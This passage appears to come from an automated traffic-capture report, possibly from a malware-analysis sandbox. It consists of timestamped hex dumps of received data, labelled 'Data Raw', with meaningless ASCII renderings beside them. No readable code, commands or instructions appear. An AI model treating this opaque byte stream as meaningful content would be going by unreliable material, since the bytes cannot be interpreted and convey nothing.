ab 8f fe 51 72 ec 0a df 22 e9 0c a5 de 47 4e f2 39 9c 4b f6 ca 77 87 fa 3e 2a 26 c8 44 b8 60 70 07 4c 34 63 b3 dd c7 95 15 fa 1a 41 c6 ca df aa 45 07 50 91 80 e0 20
                                                                                                        Data Ascii: 0VRjPOi"4`^w?kQxURvSlC@=r#ul22c0J4m^<u5H-9NEM_C>Gi+e5srmMm`di"JXgzIYbjJN!J'5v/j#Unq2pT|^PtDUQr"GN9Kw>*&D`pL4cAEP
                                                                                                        2022-09-29 12:46:35 UTC14293INData Raw: ec e8 31 fe ff 0e 18 41 a1 2c c5 db 2b da e5 fd 7d 29 d2 78 a3 54 32 5d 4b e9 65 79 48 0e bf 46 18 d2 ac a5 db 4f bd 07 00 da f5 a0 c9 e4 a1 4d ff b7 fa 74 d6 58 a9 cc b0 92 b0 b9 5b 3e 34 20 32 a2 a5 fb b0 e1 a7 31 dc 59 43 90 41 a0 6c bf e0 fc 8b 76 2e 91 13 69 fa f2 42 ad e1 5e 37 45 a2 a7 3a 60 1a db 1d 8d bf 53 8b c4 44 b9 15 ff b9 38 5f 65 fd 53 89 7e 24 a9 d2 ba 28 99 22 21 9f 6e 9c c6 a9 a1 82 4e 3f e9 2d 66 f3 5f ef 52 85 2d 1f 49 a8 21 5e 5a ed 2c e0 7f b1 df 85 53 33 22 13 4e c8 3f e6 f2 88 a6 54 e9 8b bd 3c 08 f9 c6 1e 9b e0 ee 3f 8c e5 f3 25 97 73 40 c0 f6 6d 87 41 dd 2e 78 5f ef 05 e9 b9 c7 73 14 4f 14 1c 81 17 09 e1 0b 09 c7 ec ce 72 ac 3a ab 83 5f 6b 96 e6 06 81 f0 d2 e8 f6 8f c1 74 72 64 a0 76 ce db df de 44 23 75 07 f5 fd 8c 62 2b d3 c8
                                                                                                        Data Ascii: 1A,+})xT2]KeyHFOMtX[>4 21YCAlv.iB^7E:`SD8_eS~$("!nN?-f_R-I!^Z,S3"N?T<?%s@mA.x_sOr:_ktrdvD#ub+
                                                                                                        2022-09-29 12:46:35 UTC14309INData Raw: b4 e9 7d e5 0e e7 08 1d 37 95 c1 28 e7 04 ae 5a c9 0c c1 db fc 02 0c 98 91 e6 ee 9a d0 95 f5 c6 23 52 73 b4 96 a7 f4 4e c6 06 cc c1 c6 62 82 35 76 94 d6 98 72 95 91 0a 3a e1 3d b1 5d ea a8 77 b1 97 e8 a1 db 70 97 79 cd ca 69 94 d5 ab 60 bd 29 aa 4c cd 37 00 53 ff 3c a8 5c b0 a1 87 34 23 2d 6c 70 f6 45 03 85 49 f5 9f 22 8f b4 25 4b f3 82 38 06 b7 37 46 cd 67 b8 4b 91 da 02 52 56 63 8d 8e 2b 08 66 27 87 25 47 8e df 5d 44 33 90 fa 1d 45 9b ac 00 fc 84 2d e1 4d 43 90 23 ef 6b 55 b4 72 06 ef c3 1d a3 23 52 5d 96 7c 21 d7 40 b2 6e b5 83 c6 0e 30 a2 8c db be 1b ae fb 13 8c 81 ef 8e 1b d9 e8 14 65 09 be 0d 2d 01 e9 68 c2 16 b3 a7 53 50 dc 1a b9 27 81 f5 33 2e 99 fe 12 9f 8a f6 63 f9 65 be cf ab 9d aa b6 d5 41 c4 9b 02 29 f3 91 b3 d3 7f ed 96 aa 22 2d 67 c3 64 84
                                                                                                        Data Ascii: }7(Z#RsNb5vr:=]wpyi`)L7S<\4#-lpEI"%K87FgKRVc+f'%G]D3E-MC#kUr#R]|!@n0e-hSP'3.ceA)"-gd
                                                                                                        2022-09-29 12:46:35 UTC14325INData Raw: 4a f0 65 5a b3 53 2b ac 28 0c a0 4d 5c 3a 1d b1 d0 bb 87 d2 61 37 ea 34 90 17 39 4b 48 27 2d 3e ff 55 f1 e5 14 81 4a e7 86 71 f6 77 66 05 25 2f 1a 7e 59 2c 0a ef 9f 83 33 03 00 34 c9 ff 53 d8 0b 0d 52 10 36 44 79 22 ee b8 a8 3c d1 ac 64 c6 50 d9 b7 8f 3d 6e 9f 90 05 0e 1e e7 4d a6 2a e3 8c 90 20 a9 4e 4a 3b 40 81 04 95 7a 3c dd 9d 36 f1 a9 2d 2f a1 df a4 96 99 6f 34 75 87 1f bd 84 b4 ea 44 35 05 ab d1 6d bf d3 f5 cb 41 5d a1 be 1c e4 de 1e 91 19 7f 1e eb 7a a4 15 cc 06 ae 7c eb 6e 82 7c e9 4b 76 68 ae 98 6c 47 37 40 a2 71 b8 89 92 8f dd 4c bd 97 af 0a fc ba fd 76 9d 55 77 73 53 91 7e f6 1d 9c f1 bd 64 6a b2 d5 9e 85 71 e5 3b 7e d1 26 64 ce 87 a8 5e f8 49 ff e3 2d a7 cf 2e 7c 48 fe e8 24 0c e1 f6 8a 39 c6 12 ed ae b1 27 13 5b 51 77 b4 cd 36 29 85 96 a4 b5
                                                                                                        Data Ascii: JeZS+(M\:a749KH'->UJqwf%/~Y,34SR6Dy"<dP=nM* NJ;@z<6-/o4uD5mA]z|n|KvhlG7@qLvUwsS~djq;~&d^I-.|H$9'[Qw6)
                                                                                                        2022-09-29 12:46:35 UTC14341INData Raw: 23 fe 0a d1 6e 1b 15 86 d9 be f4 cb 30 d3 2b f5 5b 3c f6 b4 dd 53 31 ae b1 b2 68 c4 59 e3 0e fb 99 21 d8 52 00 32 33 b7 ab b1 f3 26 44 50 95 f5 30 e6 6f 87 9d 79 38 b3 33 f3 47 40 0d 42 c8 17 ef 54 35 09 7a b6 bc 27 82 7c d6 72 8a 9f 06 35 9e 0a d5 c0 4b 1d 84 2e 5d 28 9d 95 13 e8 7d ec 3e 23 55 0e b5 4d 97 fd 17 22 2e 88 14 2b 03 77 02 14 b2 86 f0 4f e5 7d 04 af e4 f2 60 ec a6 5a ef 62 ce 30 93 a9 a8 60 85 77 eb 66 e0 5b ab 4e f2 03 68 57 55 03 c1 e3 61 9f 34 79 11 04 76 aa d1 c8 af 14 69 3b f5 34 61 31 52 da d8 52 cf b0 3a 5d a8 04 65 ef b1 e1 b3 dd 02 45 c2 04 e8 82 51 28 b9 dd 44 b5 c2 40 d6 38 a8 64 e2 24 e8 81 70 6a b9 62 04 93 9c 2e b0 0b 8c 69 81 8e 6a ee b9 d5 51 99 d6 a5 2f de 5e eb bc 1c 11 a4 2d d2 4e bd aa e7 ad 6b 94 6d 5f 8e 57 72 96 f2 e5
                                                                                                        Data Ascii: #n0+[<S1hY!R23&DP0oy83G@BT5z'|r5K.](}>#UM".+wO}`Zb0`wf[NhWUa4yvi;4a1RR:]eEQ(D@8d$pjb.ijQ/^-Nkm_Wr
                                                                                                        2022-09-29 12:46:35 UTC14357INData Raw: cc 7f 3b 71 62 b0 e4 c8 0b 5e 2d 57 e4 ba bf 05 7d e6 34 50 2e d1 89 4b c5 9b f0 52 95 c3 b7 95 cd 5a 10 61 58 49 da b0 43 bd 6c 11 46 ae 5f eb ea 88 d2 4c 16 55 90 cf cf 65 5b 99 d9 81 80 d2 43 d2 ed 5c 1d 7e a1 cf 53 38 dc 09 1d e7 08 9a 3e 08 67 57 3e c5 62 3d a1 53 a9 86 bc b2 91 70 e0 b9 55 18 1e 3b dd f8 ac d4 a6 cf 27 05 fe 4a 05 7c 88 ba b9 de 11 ce c2 c8 6e 26 83 17 6e a6 9c 79 ee 8e 89 e5 7f 60 96 2e 80 f4 b7 13 9d 66 95 46 b9 68 31 c9 54 ad c4 69 ad 43 7b 38 1b 65 27 ed ab 42 75 c0 45 b0 d6 dd de df 20 18 87 41 d5 88 df e9 89 70 5e f7 a3 ec 51 c5 3c 39 ab b8 3c 19 5c 83 4b 74 8e c0 0f 04 56 60 f2 51 97 9c cf 91 8b a4 bd 3c 30 57 90 bd eb 50 fd 50 a1 de c0 42 10 f4 aa 6a 78 b8 c0 5b 3a e2 80 54 b2 e0 15 e4 b4 77 7f 05 6b 87 d6 1d 19 90 ec 3e 54
                                                                                                        Data Ascii: ;qb^-W}4P.KRZaXIClF_LUe[C\~S8>gW>b=SpU;'J|n&ny`.fFh1TiC{8e'BuE Ap^Q<9<\KtV`Q<0WPPBjx[:Twk>T
                                                                                                        2022-09-29 12:46:35 UTC14373INData Raw: b1 3f 3e c3 5c 61 23 90 f6 4a 60 9a 43 25 04 51 a3 96 2d 95 e6 aa 54 cf 71 ba 95 26 b3 68 eb f7 70 88 40 32 2d 6d ef 7c 09 58 49 f7 f6 08 98 60 f1 9d ca ce e0 b8 dc 5e f5 c1 f6 7b 86 d8 b2 8d d5 84 aa ab f5 03 69 1e 23 42 f9 e9 b4 cb ea a1 ab 12 c3 e5 d9 bd dd 6e 2e a2 1b 19 f7 e5 01 28 21 b0 f1 a1 10 84 4a d0 a2 29 62 54 1f 4f 80 68 b2 be 64 bb db 82 77 e6 2b 6a 22 85 7b 65 5f de f5 a1 81 dc eb e6 ff 52 f4 63 4e 42 6e 16 ab 33 bf ac aa 54 1e ba 99 58 e1 65 91 8e 8f 9a 05 11 92 e4 7e 29 24 d6 37 8b 13 23 f1 35 d3 a7 16 a7 c4 a4 54 b4 ee 44 63 3a 33 bd f6 c8 f3 dc 33 90 1f 80 8b 64 69 ae 1c c2 00 81 89 58 7f 8b d5 df 9b b0 13 d0 30 76 6d 68 22 b0 bb cb 4d 39 97 07 5e 02 8b 4d c0 03 8e 75 6a 95 c8 c3 d1 00 7d 56 7e e8 11 10 be 1d 62 4c af e7 f5 c7 8c ef db
                                                                                                        Data Ascii: ?>\a#J`C%Q-Tq&hp@2-m|XI`^{i#Bn.(!J)bTOhdw+j"{e_RcNBn3TXe~)$7#5TDc:33diX0vmh"M9^Muj}V~bL
                                                                                                        2022-09-29 12:46:35 UTC14389INData Raw: e5 25 19 0d 59 34 40 52 13 4c 72 4f 4f 80 18 4f e9 23 90 4f 95 57 40 ea 32 eb 02 15 2d ca d3 ca ab 8d a1 24 2c 5c 83 54 fb b1 10 05 21 84 4c f5 46 b1 ae 7e 88 17 d5 4e 01 07 0e de f8 d6 0e 24 20 ef 3c 0d c8 d3 2d 42 18 17 e5 8e 2a 5e 4a 7f ed f8 6e 9f 82 da 85 b1 a2 48 91 08 14 ee d6 d7 b4 ff 9c 06 68 1b 98 3b 14 c1 03 ff c3 ab e9 57 c9 13 2d 68 cc ec b7 1e df 0f 75 98 30 8f f4 7c 64 97 04 ef 09 0b 4c cd 4a 53 dd d3 b6 8b c8 55 c6 e0 b4 f9 74 f7 ed c6 d4 7a 3d 98 d0 18 57 ce 6a 08 31 e5 f2 34 f9 48 64 e1 fc e5 d8 c5 d7 84 9d e2 c1 5d da f8 44 89 ae 4f dd 22 51 1e c9 71 5e 8f be dc e3 94 92 bd 30 51 a9 87 29 8d b4 2f fb 11 35 cb 4b 6c 0b 42 82 1a 0d dc a8 01 8d 12 40 44 f8 1e 64 1b 3a 7e 9a 92 d9 4a a5 61 2d f1 a9 4c b1 35 37 93 62 87 9e 9d 63 f7 33 f4 c3
                                                                                                        Data Ascii: %Y4@RLrOOO#OW@2-$,\T!LF~N$ <-B*^JnHh;W-hu0|dLJSUtz=Wj14Hd]DO"Qq^0Q)/5KlB@Dd:~Ja-L57bc3
                                                                                                        2022-09-29 12:46:35 UTC14405INData Raw: 04 c0 f4 18 e9 3b 61 be bc 13 6e e6 64 c0 3d 91 15 2a 7a 18 ef 15 6d f9 92 52 0d 11 91 b4 c9 1a c8 71 2a d1 64 44 f4 a9 55 46 d0 d5 0b 7b e6 87 d0 11 b8 37 af a9 f8 18 46 f8 dd 62 41 8a 09 92 a8 87 4c 43 f1 e7 7c 13 5d 81 1b 0b 33 a2 cb 6c 01 29 22 64 aa b6 bf 5b 40 13 df d8 b2 6e 34 db 47 b8 76 13 a0 37 c9 71 71 b1 5a 86 e1 ee 69 4f 09 0f 01 55 0a 29 e9 2f d5 a9 98 ba 00 ea 10 c7 2e 30 1c 87 ad fb 8f a5 1c 96 03 2a ce 84 5d 2c 78 09 b9 30 33 fe d7 a3 bb f8 04 34 af a9 87 07 e1 e4 4b 93 d4 88 db e3 63 52 5a 63 a1 95 3c ee 9a 6d 87 0a 58 4a 43 60 b6 4a 9b 0e fe fb 9c 08 58 be bf 36 d4 22 1b 7a 8e cb a2 af 25 2c a3 2b ec 1f da 1c 81 92 38 82 56 7d 14 28 55 da 70 54 f9 37 5a 7e 00 f8 30 c1 f2 da 31 56 ab 0a a3 41 3d 61 94 29 11 7b 10 ea 0e ce 46 43 71 5c 34
                                                                                                        Data Ascii: ;and=*zmRq*dDUF{7FbALC|]3l)"d[@n4Gv7qqZiOU)/.0*],x034KcRZc<mXJC`JX6"z%,+8V}(UpT7Z~01VA=a){FCq\4
                                                                                                        2022-09-29 12:46:35 UTC14421INData Raw: 1e e6 04 79 52 85 4d c8 98 66 e6 67 ae cd 6d 39 e7 50 30 98 e9 7a 75 2a 73 e7 40 c7 31 0b cd 65 f6 9a dc 7d c1 f9 1d 61 23 95 44 88 19 9b a3 2c 03 c8 6f 7b f5 83 bf e4 c8 66 ea 94 f8 69 26 bd 51 09 66 e3 c2 40 7d b0 99 7f 31 05 e7 bd 6c 28 86 c9 2c 77 b3 03 bc 3d cf 71 c5 1f 03 1d 26 43 03 e9 13 22 af 6a a8 47 4c 37 53 1a 55 db 7a e3 5b 4b da 44 4d 31 22 cf fc 4d 2d ac 94 ae 10 38 64 d7 a0 c7 c8 22 bb 9d e8 3f 76 29 ef e6 c6 29 ec d0 fd db 32 a0 d8 16 a9 e8 9a 8d 03 41 2b aa db c4 18 a4 3e 82 8e 44 c1 a5 61 53 9a e3 3b 81 41 23 2e c9 81 cf b9 8f 9f 9c 79 5d 94 6f fa 98 de 07 2c a4 9c fe 8f b7 83 a0 b7 44 85 a1 65 0a 1d fd 75 ce 0d ec 04 eb 97 70 83 ad 3b 5b 00 16 f1 04 f5 b5 0e f6 b8 47 53 83 69 78 f8 88 0c 27 fa 94 b9 4e 78 95 06 e5 2d 91 63 ce 01 f3 90
                                                                                                        Data Ascii: yRMfgm9P0zu*s@1e}a#D,o{fi&Qf@}1l(,w=q&C"jGL7SUz[KDM1"M-8d"?v))2A+>DaS;A#.y]o,Deup;[GSix'Nx-c
                                                                                                        2022-09-29 12:46:35 UTC14437INData Raw: e5 d4 16 cb e3 d0 03 cb c6 a1 8c f7 2a b9 36 52 de 5e 05 96 45 e4 16 0d c1 9a fd 0b 6e 07 f3 04 1e 2e 59 ca c1 67 06 aa 8d a1 9e f9 c5 62 50 d3 d8 95 3a 11 a2 0d 1d 92 c2 d8 5e 36 f9 ee dc 66 1c 67 cb c4 0d b1 53 44 fd a5 fe 3f aa f7 75 c4 3b cf 4b 1e 77 e4 d5 8a c2 dc 18 6b c1 38 62 66 00 55 45 47 5e 37 7d b5 52 b0 65 3c 33 f5 5a 82 f3 9e 78 17 4a 65 dd 52 11 15 50 9c 4e f9 13 c2 d8 c0 c8 9f 1f de 78 27 3c 93 0c 97 1f 85 40 bb 1c b1 e0 28 e0 72 69 c8 17 00 31 d6 04 dd 1d 15 50 a2 38 78 f6 d5 ae 4a 43 d2 6a e3 17 b3 ba 61 56 fe 9a 61 5e 0d 36 13 e1 60 38 a5 29 3e 25 ad 8f 75 8c 07 ee 11 8d 7e 81 3a 24 46 83 d7 97 7e 69 a1 eb 20 ac 1b f1 8a 92 d8 ec e7 49 db 5e b4 48 ec 7d 70 c9 5e ad 00 27 28 9c 93 46 f5 f3 b2 c6 30 9f f7 58 62 c8 b2 75 b7 90 86 ec ed 14
                                                                                                        Data Ascii: *6R^En.YgbP:^6fgSD?u;Kwk8bfUEG^7}Re<3ZxJeRPNx'<@(ri1P8xJCjaVa^6`8)>%u~:$F~i I^H}p^'(F0Xbu
                                                                                                        2022-09-29 12:46:35 UTC14453INData Raw: 1c 1a c9 b3 5f ee 7e a1 aa bb f7 27 c9 ec 9e 09 2c 57 3f a7 59 5d fa 1c 91 34 9a 0c 04 b2 ef b4 1c 2e 08 a1 4f 73 fb 6e 6f d4 4f e2 fe 5c 91 6f ae b7 ed f8 ce 48 7d 4d 2e 14 23 59 5c 38 a1 70 5f b8 3d 49 22 ad 35 91 93 7e 4a f7 5e 23 68 cc c3 d6 4b 11 6d f5 33 68 0f 3e 6e 99 c4 bb af a5 be 7b 8e bc a7 b9 c9 d2 df 89 74 5c c4 2b 07 8a b1 ee a2 2b 80 85 bd ed 18 0a c7 29 92 97 ee e2 a4 98 f2 74 b5 80 47 e7 f9 a2 bc c6 fa ac 47 a3 95 c4 a4 e1 27 80 33 d6 a5 e2 72 76 1b f3 f9 ae 0e 1e 34 b0 b5 ca 6a 5e 0e 29 fa e1 3c be f6 d9 26 c5 2e f9 6f b3 d5 61 47 aa fe 16 67 b3 a3 d7 c0 a5 7f 9b 37 c2 18 09 98 19 28 09 8e d1 4b 6a 16 72 21 c9 69 c7 52 3c 76 86 55 2d 9a 3b da aa 0e 4f c1 d8 e0 0b a2 65 23 3c c8 23 51 0b 79 ed 29 ed 6d 23 6a 4f fa f2 57 cd cd f9 db 00 c6
                                                                                                        Data Ascii: _~',W?Y]4.OsnoO\oH}M.#Y\8p_=I"5~J^#hKm3h>n{t\++)tGG'3rv4j^)<&.oaGg7(Kjr!iR<vU-;Oe#<#Qy)m#jOW
                                                                                                        2022-09-29 12:46:35 UTC14469INData Raw: ad f1 aa 08 58 41 6f c6 0e 2e 6c 77 29 22 55 42 c7 69 90 c5 7f 12 44 eb 57 8e 05 65 cc 77 e3 25 56 ec 9d ef 85 30 db 9e bc 5f be d4 17 c0 3b ed dc fa ca 8a b8 c5 3d fd 22 c1 b4 d7 d3 ac f8 f4 30 d9 e5 c1 c1 fa de 16 cf b9 a4 09 65 39 a7 aa 50 07 99 2a 72 0f 45 60 7f f5 d1 93 85 ef 08 a6 b9 8f cd 48 25 21 a6 2c b3 0b 36 84 73 2f e7 73 9f 1c 74 a3 fa a3 08 24 f0 47 fb 54 bf 7b a8 12 fc 17 73 4c bf 88 8d 81 9b 61 da 1d 4d 98 36 d0 2c 71 f4 c1 87 5e b7 e0 c4 08 68 73 7a f2 3c 51 8f ed 23 6e 2f 0a 76 0b 2d cb aa 8a 2f 1a f4 b5 ef ef 49 03 76 e7 d8 91 14 97 02 c0 2a 5a 43 1d 26 c8 2c 66 8f c7 ee da e5 57 5a 83 82 55 b8 c0 8a ea 3d 56 20 c9 49 85 a9 11 6c d6 d5 5b ad a8 21 ce 0f de 07 59 cc bc d9 6c 55 5a ef 6e d2 17 2c af c4 bf af 0a 8f e6 fb 85 24 43 80 f4 ee
                                                                                                        Data Ascii: XAo.lw)"UBiDWew%V0_;="0e9P*rE`H%!,6s/st$GT{sLaM6,q^hsz<Q#n/v-/Iv*ZC&,fWZU=V Il[!YlUZn,$C
                                                                                                        2022-09-29 12:46:35 UTC14485INData Raw: c5 10 bc e3 3d dc 49 d9 24 e6 70 cc 18 4b ad 24 8d df bd 2e 25 e9 a9 7f d8 65 d4 1d 4e f0 42 3f ff c7 ec f3 ba b6 5e 49 d3 ea db e7 5b 57 76 0f a3 7b 16 17 8c 1c b6 80 08 b5 9f 36 c3 f3 1f 14 e7 bb 5e d6 55 02 89 dc d7 3d 68 5e 11 73 ab 7e a4 39 21 d7 9b a5 a7 d0 01 c7 cd 7f ea df 21 ee 0a 69 26 34 70 5a 40 bd 9c 7b bb 37 90 92 bd b7 ef 46 8d 5f d7 71 ff 96 1b 07 12 b2 29 f0 83 ac 36 10 5b 07 a9 32 df 42 3b 56 90 66 16 60 4e 7f 51 39 77 10 89 fd 95 b8 2c fa fb 7d d5 f0 21 37 26 27 e3 b3 64 50 6e 8e 98 e6 25 92 47 36 29 74 d3 52 53 9c 5c 02 1f bb 50 84 0e 32 57 fc 67 30 b3 44 f7 8d a5 cb 27 1f 43 fd 4e 06 21 1a d7 4d 9f 42 fb eb 90 58 2a 7b 75 89 1c 41 f8 a1 90 a9 3e 30 80 86 d2 66 c2 2d 1f 4b 8d 62 66 db 9d 7a 12 88 7a 4f cb 32 dc d4 26 d8 ed 4a fc 37 4a
                                                                                                        Data Ascii: =I$pK$.%eNB?^I[Wv{6^U=h^s~9!!i&4pZ@{7F_q)6[2B;Vf`NQ9w,}!7&'dPn%G6)tRS\P2Wg0D'CN!MBX*{uA>0f-KbfzzO2&J7J
                                                                                                        2022-09-29 12:46:35 UTC14501INData Raw: d1 6d 68 88 d3 f2 11 c9 fa 68 eb 41 4c e2 2c b4 85 ed 62 9e 0b 12 23 62 41 9a 31 3a cd 8b 41 7c ca fc aa 46 f4 89 e6 03 8b 89 77 6f c9 14 22 5a 9d d5 58 66 31 3f 28 cb 58 e9 6e 60 fd 87 8a 55 0f 33 dd 51 f3 8e 81 6c bd a4 c5 09 eb 54 b8 bf 73 54 af 1d 87 28 90 a4 3d 72 bf 0c b3 48 64 0e 17 9d 07 f7 15 17 ee 0d 7d cb fb bd 8a 2b f0 3e 94 29 76 8a 43 4f 25 66 7e b8 9c cd 73 8e eb a8 36 ce 7c 68 88 c0 d5 95 28 7e 9b c2 7c 08 12 5c 00 25 85 da 4a 19 42 bb a2 a4 c1 18 7b 84 39 84 2f d1 60 6d 1c a9 49 aa 42 da c6 5b 87 f3 9c 99 df 50 15 18 e6 de 5b 98 24 09 7b ef 13 73 0c c3 c2 18 d5 07 35 9f 11 8a 62 37 7a e5 ac e4 7a 70 4a a1 0f 4a a8 bb c0 b8 7e 11 c4 ff 7a d5 a4 82 b0 96 d3 ce ef 83 d0 c0 f3 bc e5 e9 bb f3 09 ce cc 30 a6 d7 69 89 7c b0 d6 85 51 c6 01 53 22
                                                                                                        Data Ascii: mhhAL,b#bA1:A|Fwo"ZXf1?(Xn`U3QlTsT(=rHd}+>)vCO%f~s6|h(~|\%JB{9/`mIB[P[${s5b7zzpJJ~z0i|QS"
                                                                                                        2022-09-29 12:46:35 UTC14517INData Raw: 51 fe 9d c1 5b 49 6b 5a 95 4a 5b 8f 0a 89 a3 00 d3 ff 69 ca 61 fe da b2 64 e6 61 cd 32 69 4c 40 19 19 f8 24 3f 42 d7 1e ea b9 1e 33 a0 ae c3 63 88 5b bd 21 5f 88 44 2d a6 42 d5 24 cc 6b a7 b6 a4 cb 1e 2f 84 ee 81 16 0c 27 8c 78 47 1e 3f 9c 61 f5 06 b4 73 bd 20 96 f6 1e c9 9b 22 d2 54 21 87 4e 0e eb 01 2b 14 7d 6f 2e ce c7 19 a3 17 bf d4 67 55 fb 0a 0b 72 d0 18 58 f2 c2 07 17 f1 74 4c 96 13 00 c7 c2 62 71 42 36 78 7f f2 38 e6 eb 1d ef e5 3f ce 1a b4 95 c5 41 7a c0 0a e8 e3 84 3b fc aa cb 45 4a 28 f9 bc f8 c4 f6 a5 2c 49 2f cd 13 2f ec f5 c9 9c d0 39 56 45 23 47 a2 f3 a7 6d 44 dd 23 45 a2 70 b7 53 67 b1 00 d0 b7 ac cc 2f ab 66 a4 ff 4c 1b 51 41 42 9a 1f 50 5a db ac 87 06 f1 b0 21 73 55 ba b7 d9 d0 51 2e 98 db cc 44 50 75 98 44 be d8 61 eb 36 fa 86 32 df 37
                                                                                                        Data Ascii: Q[IkZJ[iada2iL@$?B3c[!_D-B$k/'xG?as "T!N+}o.gUrXtLbqB6x8?Az;EJ(,I//9VE#GmD#EpSg/fLQABPZ!sUQ.DPuDa627
                                                                                                        2022-09-29 12:46:35 UTC14533INData Raw: af 57 07 bf 80 43 18 34 22 60 c1 39 ed 3f 64 17 72 b1 21 a5 8a 19 9b 94 cf d8 c0 96 03 57 2a 59 ed 4d 35 26 29 1b c5 60 05 9f 70 eb 28 c0 27 55 9d c6 89 e1 d4 d9 0d 26 3e 92 77 5d a4 39 79 3c ac af 2e 0f 32 1e 7c 1e 62 1c 6c c7 fb 24 d3 d0 e9 7e 66 75 23 38 b9 4b 8d 68 c0 eb 1c f0 30 ba 55 f0 f2 d4 6d 05 c0 b2 00 0e a6 50 28 de 0a 16 d4 cd 91 69 39 ba 68 0a f5 45 d3 56 4a 08 5e 43 c0 99 62 46 36 cd 4b 5a c6 91 6e 54 e4 f0 d2 0f 52 96 35 ca 52 5b 46 bc e7 d8 5a 54 86 19 03 d6 af fa 3e d9 9c 93 94 66 39 86 ee a3 72 fa 39 66 e5 6f 85 5b d7 66 07 2c 95 65 43 86 13 59 3e c0 86 70 45 d2 19 b0 45 fb 4c 87 2d fc 66 3f 67 3e ea 41 e7 36 73 76 89 fb 79 e5 94 27 85 fe c9 06 9f 13 4b 62 08 c4 ff c3 0f dd 97 86 84 7f f7 b7 96 fc 3c d8 21 54 6d 55 7f 55 ee c6 88 be b4
                                                                                                        Data Ascii: WC4"`9?dr!W*YM5&)`p('U&>w]9y<.2|bl$~fu#8Kh0UmP(i9hEVJ^CbF6KZnTR5R[FZT>f9r9fo[f,eCY>pEEL-f?g>A6svy'Kb<!TmUU
                                                                                                        2022-09-29 12:46:35 UTC14549INData Raw: 88 8d 8a 8c dd f4 27 56 8d d6 79 a3 24 c7 7e d3 78 df e6 f6 87 cd 44 2d 14 16 9d 4d e4 07 81 8b 4a 13 af 52 08 ee d0 e0 be 36 11 77 08 8b 88 c0 03 c7 f2 3b 92 3f 3e 98 28 c5 40 17 8d a8 cf 2d ea 18 9e 90 9e fe f5 b8 97 6e 69 50 cf 16 5f d3 ca da 33 71 6a e2 72 1a 0d e8 76 0a ef 0f 84 72 76 f7 35 36 f7 6a 55 a7 58 f6 3c 82 86 c1 b9 5c 48 b9 93 61 8c b3 da a0 bc b7 b1 1f e5 c8 e6 76 5d 92 1d 7b c5 e0 ae e2 b0 65 12 10 95 8e d6 fe c7 2d 0b 9c ad ad 9f e9 50 dc 41 dd 29 a2 a5 6a 07 76 a9 63 8b 68 cf 5f b5 8b 54 53 85 62 e5 37 25 f8 48 f9 a7 7b 00 fd a7 03 7a 52 52 1b f7 9e 3b bc 13 87 8f 70 41 52 16 15 8e 16 ba 67 67 64 41 12 6e 63 03 ea e0 61 b5 3b 1b 4f bf fd 0c 85 5d 4c 66 7f 9e 92 bd ab 53 64 29 fb 42 c3 ff 01 a3 99 2d af ad cb cc 15 19 5e 94 4f 72 78 e1
                                                                                                        Data Ascii: 'Vy$~xD-MJR6w;?>(@-niP_3qjrvrv56jUX<\Hav]{e-PA)jvch_TSb7%H{zRR;pARggdAnca;O]LfSd)B-^Orx
                                                                                                        2022-09-29 12:46:35 UTC14565INData Raw: fa 47 32 35 d7 32 64 b2 eb b7 a8 3c 35 73 47 6d d9 92 dd 87 9c c7 7c 62 c4 da 14 ba 8e 77 66 d3 56 6d 40 59 c2 60 f9 b7 0f c7 e6 23 03 7d 0f c4 86 53 90 69 6b 0b 42 a6 a2 9f 0b f4 2f 69 9f 3f 4b 5d ad 41 45 5d cb e8 8e d1 c7 3f 41 1a 87 f7 a0 f9 21 93 8b 12 06 95 36 ce d1 fb 18 fa 87 1a 35 3a 4f 7c 7b c5 cc c6 a8 ed 1e d8 86 4a 5d aa c7 e4 64 ea b2 ab ce 73 4e 4b b0 79 72 e6 f1 ae 8f 33 58 18 52 87 98 3c b5 d1 cc a8 cc 8d 0e c9 b5 12 d3 f3 48 d6 43 94 c6 0e 8b e8 b0 ec 51 fe 5e 54 cc 8f 74 75 d0 af e5 4c 46 b1 29 6a 96 3e f8 52 53 61 bf 7e f4 ab 1b b4 f6 fd ed b2 8a 91 3a 93 22 fd c2 37 fe 63 9b 32 50 a3 5c 86 d7 2d 13 3c e2 05 05 f4 4f d6 14 0e 40 7e 09 8e 2f b0 56 5e cc 1f fb 44 79 da 4a 99 5c 3c f5 38 25 80 0e 80 ef 12 1f 01 49 41 b8 3f 1e 42 9a 5c 7a
                                                                                                        Data Ascii: G252d<5sGm|bwfVm@Y`#}SikB/i?K]AE]?A!65:O|{J]dsNKyr3XR<HCQ^TtuLF)j>RSa~:"7c2P\-<O@~/V^DyJ\<8%IA?B\z
                                                                                                        2022-09-29 12:46:35 UTC14581INData Raw: 47 b4 51 70 fd b3 90 1a 0b 7f fc 6f d9 b3 04 5d 8b 3d 0b ed 37 2a 49 67 e3 6b 52 c2 c6 62 74 68 65 3f fc fe 03 99 65 77 f8 51 ab dd 41 03 0d 63 ce cc c1 a4 d0 ad 57 de 4b a1 55 ed 5e e5 b7 98 5c 87 e5 a7 68 9a 1b b1 77 f6 b3 39 6f 9f 37 e6 a6 53 b0 40 1e b2 3b bf 1c ee 21 f9 81 1b b1 f7 0f 6c 8d df e0 5f bf ac f0 50 3b d9 11 03 d4 6c d3 cf f0 2a ac 96 b7 67 6e 05 c6 b5 ce 5d ec 46 da 15 1c f7 04 7e dd 32 a0 55 fc d0 44 7e 23 8a b5 e0 32 6d 39 59 95 8c 20 c3 cf 5a 46 d8 1c 84 5e 81 89 b8 88 f7 6a 6b 42 2e 8a d7 6e ce 4d 13 54 a1 0a 5d 65 7a d0 ef 3a 57 7f 0c d3 bd 1c 24 94 75 e8 a1 36 0d eb 1e a7 f5 5d 43 74 f2 91 e3 94 c1 ea a3 41 ad f8 51 84 e1 6b 3a 30 12 b0 44 9b 73 ad 2b 3a 7d c3 c1 18 19 27 b3 de a3 59 e3 38 b3 a2 7e 05 e4 99 bd 53 a8 41 2f 97 58 54
                                                                                                        Data Ascii: GQpo]=7*IgkRbthe?ewQAcWKU^\hw9o7S@;!l_P;l*gn]F~2UD~#2m9Y ZF^jkB.nMT]ez:W$u6]CtAQk:0Ds+:}'Y8~SA/XT
